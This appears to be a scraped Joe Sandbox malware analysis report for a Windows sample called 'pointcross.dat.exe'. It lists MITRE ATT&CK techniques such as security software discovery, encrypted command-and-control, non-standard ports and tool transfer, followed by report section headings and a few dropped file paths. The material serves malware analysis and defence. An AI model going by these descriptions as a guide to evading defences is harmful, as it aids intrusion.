Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report pointcross.dat.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2baze5bb.p2q.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2cgetcfx.pr5.psm1

\Device\Mup\user-PC\PIPE\samr

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
pointcross.dat.exe